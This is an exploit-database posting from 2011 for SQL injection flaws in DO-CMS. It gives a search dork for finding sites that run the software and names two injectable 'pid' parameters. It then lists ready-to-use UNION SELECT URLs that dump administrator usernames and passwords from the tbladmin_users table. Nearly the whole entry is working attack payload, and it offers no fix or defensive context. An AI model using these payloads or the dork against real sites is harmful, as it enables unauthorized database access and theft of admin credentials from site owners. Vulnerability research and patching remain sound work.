id: 15518
date: 02/28/2011
title: DO-CMS Multiple SQL Injection Vulnerabilities
author: AtT4CKxT3rR0r1ST
cves: 

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.do-cms.com/
.:. Dork           : "Powered by DO-CMS"
####################################################################
 
===[ Exploit ]===
 
www.site.com/page.php?pid=null[Sql]
www.site.com/archives.php?pid=null[Sql]
 
www.site.com/page.php?pid=null+and+1=2+union+select+concat(username,0x3a,psword)+from+tbladmin_users
www.site.com/archives.php?pid=null+and+1=2+union+select+1,2,3,concat(username,0x3a,psword),5,6,7,8,9,10,11+from+tbladmin_users
####################################################################
 


#  0day.today [2023-03-25]  #